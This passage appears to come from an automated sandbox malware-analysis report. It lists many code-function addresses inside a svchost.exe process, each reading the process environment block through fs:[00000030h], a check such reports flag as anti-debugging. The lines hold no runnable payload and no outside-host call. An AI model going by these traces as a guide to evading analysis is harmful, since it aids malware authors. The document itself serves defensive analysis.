Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]	1_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]	1_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]	1_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]	1_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC8158 mov eax, dword ptr fs:[00000030h]	1_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]	1_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]	1_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A280A0 mov eax, dword ptr fs:[00000030h]	1_2_03A280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]	1_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]	1_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]	1_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]	1_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]	1_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6030 mov eax, dword ptr fs:[00000030h]	1_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]	1_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]	1_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6050 mov eax, dword ptr fs:[00000030h]	1_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]	1_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE47A0 mov eax, dword ptr fs:[00000030h]	1_2_03AE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD678E mov eax, dword ptr fs:[00000030h]	1_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	1_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]	1_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]	1_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]	1_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]	1_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]	1_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]	1_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]	1_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]	1_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]	1_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]	1_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE75D mov eax, dword ptr fs:[00000030h]	1_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]	1_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]	1_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]	1_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]	1_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]	1_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]	1_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]	1_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]	1_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]	1_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]	1_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]	1_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72619 mov eax, dword ptr fs:[00000030h]	1_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]	1_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]	1_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]	1_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]	1_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A62674 mov eax, dword ptr fs:[00000030h]	1_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4C640 mov eax, dword ptr fs:[00000030h]	1_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]	1_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]	1_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32582 mov eax, dword ptr fs:[00000030h]	1_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32582 mov ecx, dword ptr fs:[00000030h]	1_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64588 mov eax, dword ptr fs:[00000030h]	1_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E59C mov eax, dword ptr fs:[00000030h]	1_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A325E0 mov eax, dword ptr fs:[00000030h]	1_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A365D0 mov eax, dword ptr fs:[00000030h]	1_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6500 mov eax, dword ptr fs:[00000030h]	1_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]	1_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]	1_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A364AB mov eax, dword ptr fs:[00000030h]	1_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	1_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	1_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA49A mov eax, dword ptr fs:[00000030h]	1_2_03AEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	1_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C427 mov eax, dword ptr fs:[00000030h]	1_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	1_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA456 mov eax, dword ptr fs:[00000030h]	1_2_03AEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2645D mov eax, dword ptr fs:[00000030h]	1_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5245A mov eax, dword ptr fs:[00000030h]	1_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]	1_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]	1_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	1_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	1_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
